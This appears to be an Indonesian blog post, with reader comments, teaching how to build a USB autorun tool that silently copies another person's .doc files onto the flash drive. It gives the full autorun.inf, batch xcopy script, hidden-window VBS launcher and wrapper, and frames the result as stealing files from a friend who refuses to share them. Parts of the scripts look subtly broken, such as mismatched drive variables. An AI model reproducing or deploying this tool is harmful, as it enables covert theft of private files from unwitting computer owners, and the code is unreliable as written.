Berita unik | inspiratif | menarik | sejuk dihati :)

Cara Buat Aplikasi Copy Otomatis File Orang Lain


Bagi kawan kawan yang penasaran dengan isi laptop/komputer teman,dan teman anda tidak mau file2nya di copy.Jangan kawatir aku baru nemu cara yang asik nih buat dapetin file2 temen anda yang pelit tersebut..
caranya sangat simple ikuti langkah2 copy diam2 file orang lain berikut ini : 

Langkah ke-1

Buka Notepad (saya sarankan pake program Notepad++) copy dan paste kode dibawah ini.
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Kemudian simpanlah di flashdisk dengan nama: autorun.inf

Langkah ke-2

Buka Notepad lagi dan copas kode berikut:
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\My Documents\*.doc" "%drive%\all\doc"
@echo off
cls
Simpan di flashdisk anda dengan nama:file.bat

Langkah ke-3

Buka Notepad lagi dan copas kode berikut:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Simpan di flashdisk anda dengan nama:invisible.vbs

Langkah ke-4

Buka Notepad lagi dan copas lagi kode berikut:
wscript.exe \invisible.vbs file.bat
Simpan di flashdisk anda dengan nama:launch.bat
Ok, sekarang pastikan ke-4 file tadi yang telah kita buat berada di flashdisk kita, dan buatlah folder baru dengan nama all untuk menyimpan hasil curian kita di komputer teman tadi, dimana perintah: %backupcmd% “%USERPROFILE%\My Documents\*.doc” “%drive%\all\doc”, akan menyalin semua file ber-ekstensi .doc kedalam folder “all/doc” yang berada di flashdisk kita secara otomatis waktu kita mencolokkan flashdisk kita dikomputernya, ataupun dia sendiri yang mencolokkannya dikomputernya sendiri.
sebelumnya mending d praktekkin dlu di komputer atau laptop kawan biar lebih yakin kalau program buatan ente lancar ..wkwkwk
Good Luck dech...

Cara Buat Aplikasi Copy Otomatis File Orang Lain Rating: 4.5 Diposkan Oleh: Abang Blitari

5 komentar:

  1. apa filenya di copas semua, apa gak bisa dipilih2...thank's sob infonya

    ReplyDelete
  2. kalo yang cara ini file yang ada di dalam folder tujuan langsung di copy semua gan,,

    ReplyDelete
  3. bang itu yang "%drive%" udah termasuk localdisk C: dan D:

    ReplyDelete
  4. langsung agan praktekkan saja biar lebih gampang,soalnya saya udah agak lupa, terus di coba-coba dan modifikasi gan,,
    terimakasih kunjungannya,, good luck ya..

    ReplyDelete
  5. Mhon bantuanx gan.file vbs error yg puya saya

    ReplyDelete

Silahkan tinggalkan komentar Anda,
Berkomentarlah yang bijak sesuai artikel dan jangan menyertakan link dalam komentar, saya akan membalas komentar di blog kawan..
Terimakasih..